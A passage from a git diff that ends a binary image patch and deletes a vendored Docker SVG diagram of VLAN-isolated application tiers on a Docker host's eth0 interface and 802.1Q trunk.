z>@a6l^#GBk7KrKj@`^SndMF2GD|415J;%g(X9f+ca~j=ESFPuWv`SV8N9C5Z0b!(@
z9Wc#~x&f5q2tNBE#SV~*PoL2n2LvzZQFB<zhhL=kH;nlqEghV_jc)b$2bX8P=t<9?
zyA-##URJcAHGDK{&q(t9p`-Whz2^u5@|Q-JHjdBr%Box3*xttv@{ZJ3fCoj(hhIns
z&8=AgzAf2@*%V~fp(VU~`?DD!js;{TTCniR!*gqJk^c9UNc0BIJ^O(!qzClnvEDE0
z2N>#E^y5zb-3LU7aj#xX56)m6^7EH19fG=Uh0S!ZG^EQ9U%U=#p3<<|dO$cjrxMiK
z>b@R`KW*H%`1WvJg|*X$c6qmGMF=vaFE*b4zCzAA6%F2zoqX`gN<9M36Fm^iCF|<K
zhk(pn(#`To(0cuxJ$yYlWQkg8-cshx2+>>F;I~fLlr}g*nkU_M_PN-w%3f(45Iuqn
z+MqZ6cj`ROSyX&c>x(bub_U|T1M%qD*`LYGkj`A5?L=Sg_&<O9V)NeYl^Tg+Yd)Vo
z6(Ar|FRu<b7LeLNtR2&u)>Dd)f0-4}m+gedN-{rcU8mvc7XRC+xSh?HccMd8{Jpo%
zYFiMHLN{D|jZZ$DOJ247^>-Wuq<IXPB&z`wBVbS+AgWcwZ+25BKII6S%U8|d?6Y`2
zES6_`Fz=bqqPRJLfP5W@zrgdG_wsEkVkO27)DOPyzZS%^+smFv#Rc8;ztK8*wZGmA
zG1odCh>gd8n-yQI1Vv5lLqH(g-uMVT(ft>%S96*g6yKnqzZG-kLnxIz2b*^wAi%5C
z%)D2P5c+aYl@4%I`i@d@ea$Lod$iOmtYs$|5{U)#8NKNq!s^LzSUr3b7S#O%dJjqv
z&(2<jb1QW2@@^+uJdNgVi%0jaSca6|J@pH^e1FB+3tC5mBt!ZTki~B6WGD4_`whCE
zm-U!O7o`LEW`1A>n-=$*MYm05X~>_b;-^mT>3}DA@$=$t9FT9%J->Os^yg4a4`$40
z5i+DtYbD)pl`5FN-o?2cMe{L_&(;Rb@}Te;fBbATo(^zajcIDZ(ux7KG02cSS}3)3
z5T$dLklD1Ny@z56G9+BA&JJ#MWUWsh+=Hw_Tx%HuvhjP5oOdce2_H?RI>-%L+ACHh
z`_R&sw~V8=7kTdI@5IgJ^24SUXGn*Z15vBgRJ`bgh|osXWOdoMwqlpe<KwdFH#D)4
z1Y|9>AO*H&-h2<?;yvV*Q|?%o|J}v&U2*&1KX=2K75u;x)4F~d-M<ZASzAHQQdchY
zm9*rqOO+W*l@!e5`G=(gaem9uJ*|J?IqIpDNB4o}BPhw6pnNXrx)q)1=nGAky7-+Z
z{;t_tvWFCR!=g%#ETyVz-qCKz$}ViL@pGDIxtpqY3StF|?I9MdGHRxG%F@;1CHmN-
zzXFdZ&627@MNoRQ|F7cffs^+1;S&}+nqzJUVh+CZgJ!8?9X#mblYCKqV+9N9C?MO_
zrXKGhstRS5omtD%2Z+Np*mv%ocxwNmL)f#pwXW;g0p;n1^av6$&D>ZUgz$7-dKKcP
z4z6_RQWOh&TMZR`DX9>Ug|$@iDGU#8^b_tn1SEciwr!sMVni|m64=KOpv$O?Eepx0
zz++hvsI15WZ@2;@P<#%F6|e)^29tLMf?URfO+AnWjAU1kc|j%^cpR2NMkcb$6Ov(W
z44GtH0RRBOtYPLLwvLV1499FDLynL7g6)pLH5)^YjWFmS3GfIw%P20#MA;!h23H6%
zn8;ujfGacW&|`B>U}wfZM`1w7n4oH~IRGQZ25_ARDQ6D?0yMZmBR8<lY=D42c0rF2
z2Nr`JO=1>rBoO!;>>&k9p~*R9^rlY`hu8=1$p;28iH8sYDPUmM!e{(rC5pL;cFYDn
z*1#TNMU)XE6R}7l8vEnO*iB-MFcHGV;$&im<Hx3BZ#WSoblwc6(7^)m5t)i6Zj)Q$
znIw)U0*H)Zvu4cXMyhC}!n9fqHSa~3XKtoi)Bno?vuo5#<{7g{0)c_#u_Ar{k7UT7
zv|~Cs_)c!z^gd-??@S1|rm|Dj5ijFHcdYOSvs2Zn#DuzTX3D(=hsX-%rv9&+x~}zy
zV!`#X>v;dDI<-lNT@UeyG1X$%)cCYFo!pe9``VxW|5_GAWXZHCAqhIxjC$9KOUX4J
zOgdv?8k7+^k{byTOh$uap^4ei-*{;1o12J_`BOc(rXmPW&?L&&VNVzAI?Sm-)=p?{
z!u&tAvx!PvmAGytZl;!!YvOa-Pe_8OBIW*9EbMrTEGUr5^Hzux(A1|L7zLUFaV};$
zmMr*l2n?v@nKjw3*P<O51?%mnMCYlo5E&sXhT+=rc{;QMqae>-+n5Cc@D^DJU}z~t
zJ1`0?4FT-iAr1f_2td)o#{F+>V$PyTF}xS4e~d(w-H&0(j3&$tSqIk<ak?Q-(Gmnf
z1VIo%5JZq~iZI5`&d9(F?+voB(-yF>k0iiCo-SqvCT7M#14aQe6999SUnert*{%Qp
N002ovPDHLkV1f$s#LfT!

diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg
deleted file mode 100644
index 96cd21d52f..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg
+++ /dev/null
@@ -1 +0,0 @@
-<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="586" height="601"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs/><g transform="translate(0,0)"><g><rect fill="#FFFFFF" stroke="none" x="0" y="0" width="586" height="601"/></g><g transform="matrix(1,0,0,1,295,192.98406475670114)"><g transform="translate(0,0)"><g transform="translate(-39,-89.9329528808594) translate(-256,-103.05111187584174) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#666666" d="M 300 323.5 L 300 197.98406475670114" stroke-miterlimit="10" stroke-width="3"/></g></g></g></g><g transform="matrix(1,0,0,1,295,192.98406475670114)"><g transform="translate(0,0)"><g transform="translate(-39,-89.9329528808594) translate(-256,-103.05111187584174) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 300 323.5 L 300 197.98406475670114" stroke-miterlimit="10" stroke-width="3"/></g></g></g></g><g transform="matrix(1,0,0,1,252,201.98406475670117)"><g transform="translate(0,0)"><g transform="translate(4,-98.9329528808594) translate(-256,-103.05111187584177) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#666666" d="M 257 332.5 L 257 206.98406475670117" stroke-miterlimit="10" stroke-width="3"/></g></g></g></g><g transform="matrix(1,0,0,1,252,201.98406475670117)"><g transform="translate(0,0)"><g transform="translate(4,-98.9329528808594) translate(-256,-103.05111187584177) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 257 332.5 L 257 206.98406475670117" stroke-miterlimit="10" stroke-width="3"/></g></g></g></g><g transform="translate(0,0) matrix(0.9970841003774397,-0.07631052859541608,0.07631052859541608,0.9970841003774397,6.812265994936054,40.19841100496578)"><g><g transform="translate(0,0) scale(5.40007959672885,3.87815826436388) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#999999" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,15,322)"><g><g transform="translate(0,0) scale(5.31,2.59)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.18832391713747648,0.3861003861003861)"><path fill="#c5e4fc" stroke="none" d="M 10 0 L 521 0 Q 531 0 531 10 L 531 249 Q 531 259 521 259 L 10 259 Q 0 259 0 249 L 0 10 Q 0 0 10 0 Z" opacity="0.93"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 521 0 Q 531 0 531 10 L 531 249 Q 531 259 521 259 L 10 259 Q 0 259 0 249 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" stroke-width="2" opacity="0.93"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,47,409)"><g transform="translate(4,4) scale(1.0034722222222223,1.004201680672269)"><g><g transform="translate(0,0) scale(1.44,1.19)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8403361344537815)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,1.19)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8403361344537815)"><path fill="#5fcc5a" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="matrix(1,0,0,1,115,387)"><g transform="translate(0,0)"><g transform="translate(38,-78.9329528808594) translate(-153,-308.0670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 119 409 L 119 391" stroke-miterlimit="10"/></g></g></g></g><g transform="matrix(1,0,0,1,-3,543)"><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="566" height="32" fill-opacity="0"/></g></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="566" height="32" fill-opacity="0"/></g></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="25" y="0" width="83" height="16" fill-opacity="0"/></g></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="25" y="0" width="83" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="25" y="14">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="76" y="14">Host</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="108" y="0" width="360" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="108" y="14">:</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="115" y="14">Frontend</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="171" y="14">,</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="179" y="14">Backend</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="234" y="14"> &amp;</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="251" y="14">Credit</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="292" y="14">Card</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="326" y="14">App</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="355" y="14">Tiers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="390" y="14">are</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="414" y="0" width="53" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="bold" text-decoration="" line-height="16.5px" x="414" y="14">Isolated</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="467" y="0" width="515" height="32" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="471" y="14">but</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="494" y="14">can</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="521" y="14">still</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="27" y="30">communicate</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="114" y="30">inside</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="201" y="30">interface</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="258" y="30">or</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="275" y="30">any</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="301" y="30">other</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="337" y="30">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="385" y="30">hosts</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="423" y="30">using</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="460" y="30">the</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="154" y="16" width="44" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="154" y="30">parent</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="483" y="16" width="57" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="483" y="30">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="525" y="30">ID</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,31,290)"><g transform="translate(4,4) scale(1.0010060362173039,1.00625)"><g><g transform="translate(0,0) scale(4.97,0.8)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.2012072434607646,1.25)"><path fill="#000000" stroke="none" d="M 10 0 L 487 0 Q 497 0 497 10 L 497 70 Q 497 80 487 80 L 10 80 Q 0 80 0 70 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 487 0 Q 497 0 497 10 L 497 70 Q 497 80 487 80 L 10 80 Q 0 80 0 70 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(4.97,0.8)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.2012072434607646,1.25)"><path fill="#cccccc" stroke="none" d="M 10 0 L 487 0 Q 497 0 497 10 L 497 70 Q 497 80 487 80 L 10 80 Q 0 80 0 70 L 0 10 Q 0 0 10 0 Z"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 487 0 Q 497 0 497 10 L 497 70 Q 497 80 487 80 L 10 80 Q 0 80 0 70 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,300,248)"><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="258" height="48" fill-opacity="0"/></g></g><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="258" height="32" fill-opacity="0"/></g></g><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="3" y="0" width="101" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="3" y="14">802</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="27" y="14">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="31" y="14">1Q</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="53" y="14">Trunk</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="91" y="14"> -</text></g><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="104" y="0" width="242" height="32" fill-opacity="0"/></g></g><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="104" y="0" width="242" height="32" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="104" y="14">can</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="130" y="14">be</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="150" y="14">a</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="161" y="14">single</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="202" y="14">Ethernet</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="14" y="30">link</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="39" y="30">or</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="55" y="30">Multiple</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="107" y="30">Bonded</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="159" y="30">Ethernet</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="216" y="30">links</text></g></g><g transform="matrix(1,0,0,1,200,307)"><g transform="translate(32,0) matrix(1,0,0,1,0,0) translate(-32,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="157" height="22" fill-opacity="0"/></g></g><g transform="translate(32,0) matrix(1,0,0,1,0,0) translate(-32,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="157" height="22" fill-opacity="0"/></g></g><g transform="translate(32,0) matrix(1,0,0,1,0,0) translate(-32,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="0" width="125" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="normal" text-decoration="" line-height="22.75px" x="63" y="19">Interface</text></g><g transform="translate(32,0) matrix(1,0,0,1,0,0) translate(-32,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="0" width="42" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="16" y="19">eth0</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,207,331)"><g transform="translate(4,4) scale(1.0034722222222223,1.0083333333333333)"><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#fca13f" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,207,409)"><g transform="translate(4,4) scale(1.0034722222222223,1.004201680672269)"><g><g transform="translate(0,0) scale(1.44,1.19)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8403361344537815)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,1.19)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8403361344537815)"><path fill="#fca13f" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,234.91044776119404,438.2696192696193)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,225.955223880597,428.63480963480964)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 